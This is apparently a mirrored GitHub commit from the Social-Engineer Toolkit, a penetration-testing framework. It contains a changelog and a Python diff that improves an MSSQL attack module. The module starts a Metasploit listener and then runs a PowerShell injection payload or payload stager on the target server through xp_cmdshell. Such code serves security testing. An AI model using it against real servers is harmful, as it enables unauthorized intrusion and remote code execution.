mirror of
https://github.com/trustedsec/social-engineer-toolkit
synced 2024-11-27 15:00:27 +00:00
Major updates to mssql attack powershell injection
This commit is contained in:
parent
ad4340e05d
commit
b5766a649c
2 changed files with 21 additions and 11 deletions
|
@ -3,6 +3,11 @@ version 6.0.1
|
|||
~~~~~~~~~~~~~~~~
|
||||
|
||||
* fixed menu system to remove sms spoofing (no longer supported)
|
||||
* redesigned powershell injection to be much more efficient
|
||||
* removed time delays in powershell injection, instead use pexpect expect() to wait for listener to start
|
||||
* added option to fall back to old method if powershell injection fails (option menu)
|
||||
* start msf listener first, wait for msf to launch, then trigger vulnerability
|
||||
* threaded the powershell injection command through mssql
|
||||
|
||||
~~~~~~~~~~~~~~~~
|
||||
version 6.0
|
||||
|
|
|
@ -103,8 +103,12 @@ def deploy_hex2binary(ipaddr,port,username,password):
|
|||
match = re.search("parameter version", bundle)
|
||||
# if we have a match we have powershell installed
|
||||
if match:
|
||||
print_status("Powershell was identified, targeting server through powershell injection.")
|
||||
print_status("Powershell was detected on the remote system.")
|
||||
option_ps = raw_input("Do you want to use powershell injection? [yes/no]:")
|
||||
if option_ps == "" or option_ps == "y" or option_ps == "yes":
|
||||
option = "1"
|
||||
print_status("Powershell delivery selected. Boom!")
|
||||
else: option = "2"
|
||||
# otherwise, fall back to the older version using debug conversion via hex
|
||||
else:
|
||||
print_status("Powershell not detected, attempting Windows debug method.")
|
||||
|
@ -199,6 +203,9 @@ def deploy_hex2binary(ipaddr,port,username,password):
|
|||
except: import pexpect
|
||||
print_status("Starting the Metasploit listener...")
|
||||
child2 = pexpect.spawn("%s/msfconsole -r %s/reports/powershell/powershell.rc" % (msf_path,setdir))
|
||||
print_status("Waiting for the listener to start first before we continue forward...")
|
||||
print_status("Be patient, Metaploit takes a little bit to start...")
|
||||
child2.expect("Starting the payload handler", timeout=30000)
|
||||
|
||||
# assign random_exe command to the powershell command
|
||||
random_exe = powershell_command
|
||||
|
@ -265,25 +272,23 @@ def deploy_hex2binary(ipaddr,port,username,password):
|
|||
# thread is needed here due to the connect not always terminating thread, it hangs if thread isnt specified
|
||||
try: reload(thread)
|
||||
except: import thread
|
||||
|
||||
# execute the payload
|
||||
# we append more commands if option 1 is used
|
||||
|
||||
if option == "1":
|
||||
print_status("Trigger the powershell injection payload.. ")
|
||||
mssql.sql_query("exec master..xp_cmdshell '%s'" % (powershell_command))
|
||||
print_status("Triggering the powershell injection payload... ")
|
||||
sql_command = ("exec master..xp_cmdshell '%s'" % (powershell_command))
|
||||
#mssql.sql_query("exec master..xp_cmdshell '%s'" % (powershell_command))
|
||||
thread.start_new_thread(mssql.sql_query, (sql_command,))
|
||||
|
||||
# using the old method
|
||||
if option == "2":
|
||||
print_status("Triggering payload stager...")
|
||||
sql_command = ("xp_cmdshell '%s'" % (random_exe))
|
||||
# start thread of SQL command that executes payload
|
||||
thread.start_new_thread(mssql.sql_query, (sql_command,))
|
||||
time.sleep(1)
|
||||
|
||||
# pause to let metasploit launch - real slow systems may need to adjust
|
||||
# i need to rewrite this to do a child.expect on msf and wait until that happens
|
||||
print_status("Pausing 15 seconds to let the system catch up...")
|
||||
time.sleep(15)
|
||||
print_status("Triggering payload stager...")
|
||||
|
||||
# if pexpect doesnt exit right then it freaks out
|
||||
if os.path.isfile(setdir + "/set.payload"):
|
||||
os.system("python ../../payloads/set_payloads/listener.py")
|
||||
|
|
Loading…
Reference in a new issue